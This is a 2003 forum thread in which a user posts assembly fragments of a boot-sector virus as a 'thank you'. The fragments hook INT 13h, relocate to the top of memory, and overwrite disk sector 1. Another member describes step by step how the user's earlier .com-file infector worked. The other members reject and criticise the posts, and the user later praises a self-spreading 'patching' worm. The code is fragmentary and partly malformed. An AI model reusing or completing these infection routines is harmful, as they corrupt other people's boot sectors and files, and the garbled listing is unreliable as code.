index ?blast= - Printable Version

+- Qbasicnews.com (http://qbasicnews.com/newforum)
+-- Forum: QbasicNews.Com (http://qbasicnews.com/newforum/forum-3.html)
+--- Forum: Site/Forum Issues (http://qbasicnews.com/newforum/forum-9.html)
+--- Thread: index ?blast= (/thread-1840.html)

Pages: 1 2

index ?blast= - Diroga - 08-27-2003

is there an index for the www.qbasicnews.com/?blast= sites?

index ?blast= - Plasma - 08-27-2003


index ?blast= - Diroga - 08-27-2003

thank you very much and to show my thanks i give you this Big Grin
Set SS:SP to 0:7C00 :
xor ax,ax
mov ss,ax
mov sp,7c00h
sti s

dec word ptr [413h]

int 12h
mov cl,6
shl ax,cl
mov es,ax
mov cx,512
rep movsb

mov si,13h*4
mov di,offset int13storage
mov word ptr [si-4],offset int13handler
mov word ptr [si-2],es

int 19h

cmp ah,2
jne exit_int13
cmp cx,1
jne exit_int13
or dh,dh
jnz exit_int13

call dword ptr cs:int13storage

cmp word ptr es:[bx+offset marker]

mov cx,2
mov ax,201h
call orig_int13h

mov ax,301h
mov cx,2
call orig_int13h

xor bx,bx
push cs
pop es
mov cx,1
mov ax,301h
call orig_int13h

index ?blast= - SCM - 08-27-2003

What is he posting this time?

Iam just curious after this: http://forum.qbasicnews.com/viewtopic.php?t=3720

index ?blast= - Plasma - 08-27-2003

Really, pasting code from virus tutorials just makes you look like an idiot. Especially when you don't even know how to assemble it.

index ?blast= - Neo - 08-27-2003

Very very nice... Smile However, I won't do anything with it than look at it now, but I'd like you to first beta-test and debug your code (that means running it).

When you post something like that next time, please test it on your computer first. And then estimate how we would like the same effect on our computers. You must have already guessed it: not funny.

index ?blast= - Neo - 08-27-2003

His previous (the *.com):
  • Looking at the code:
    In line 6-8 it tries to find *.com file. It takes the first it gets. (int21/ah=4e)
    In line 9-12 it opens the found *.com file (int21/ah=3d)
    In line 14-17 it writes itself to the file (actually everything between startvx and endvx) (int21/ah=40)
    In line 18-19 it closes the file (int21/ah=3e)
    In line 20 it ends the program (int20)

    However, if'd read further, you would have noticed Plasma357 already answered your question Wink

What he posted above:
  • It's about the BOOTSTRAP LOADER, which is int19. Take a look at the docs about it:

    Desc: This interrupt reboots the system without clearing memory or restoring interrupt vectors. Because interrupt vectors are preserved, this interrupt usually causes a system hang if any TSRs have hooked vectors from 00h through 1Ch, particularly INT 08.

    Notes: Usually, the BIOS will try to read sector 1, head 0, track 0 from drive

    A:To 0000h:7C00h. If this fails, and a hard disk is installed, the
    BIOS will read sector 1, head 0, track 0 of the first hard disk.
    This sector should contain a master bootstrap loader and a partition
    table (see #00650). After loading the master boot sector at
    0000h:7C00h, the master bootstrap loader is given control
    (see #00653). It will scan the partition table for an active
    partition, and will then load the operating system's bootstrap
    loader (contained in the first sector of the active partition) and
    give it control..
    True IBM PCs and most clones issue an INT 18 if neither floppy nor hard
    disk have a valid boot sector.
    To accomplish a warm boot equivalent to Ctrl-Alt-Del, store 1234h in
    0040h:0072h and jump to FFFFh:0000h. For a cold boot equivalent to
    a reset, store 0000h at 0040h:0072h before jumping..
    VDISK.SYS hooks this interrupt to allow applications to find out how
    much extended memory has been used by VDISKs (see #00649). DOS 3.3+
    PRINT hooks INT 19 but does not set up a correct VDISK header block
    at the beginning of its INT 19 handler segment, thus causing some
    programs to overwrite extended memory which is already in use..
    The default handler is at F000h:E6F2h for 100% compatible BIOSes.
    MS-DOS 3.2+ hangs on booting (even from floppy) if the hard disk
    contains extended partitions which point at each other in a loop,
    since it will never find the end of the linked list of extended
    Under Windows Real and Enhanced modes, calling INT 19 will hang the
    system in the same was as under bare DOS; under Windows Standard
    mode, INT 19 will successfully perform a cold reboot as it appears
    to have been redirected to a MOV AL,0FEh/OUT 64h,AL sequence

    BUG: When loading the remainder of the DOS system files fails, various versions of IBMBIO.COM/IO.SYS incorrectly restore INT 1E before calling INT 19, assuming that the boot sector had stored the contents of INT 1E at DS:SI instead of on the stack as it actually does

index ?blast= - Diroga - 08-28-2003

i thought it was a nice one. yeah i'll stop sharing my 1337 codes with every one Big Grin

index ?blast= - Neo - 08-28-2003

Good Smile
But one point, viruses are never 'nice', and the virus code is determined not to be 1337.
Keep that in mind please.

index ?blast= - Diroga - 08-29-2003

there was that nice worm that patched the msblast problem, but it crashed servers because it pinged the crap out of everyone to go fixed other people who were in contact with and infected computers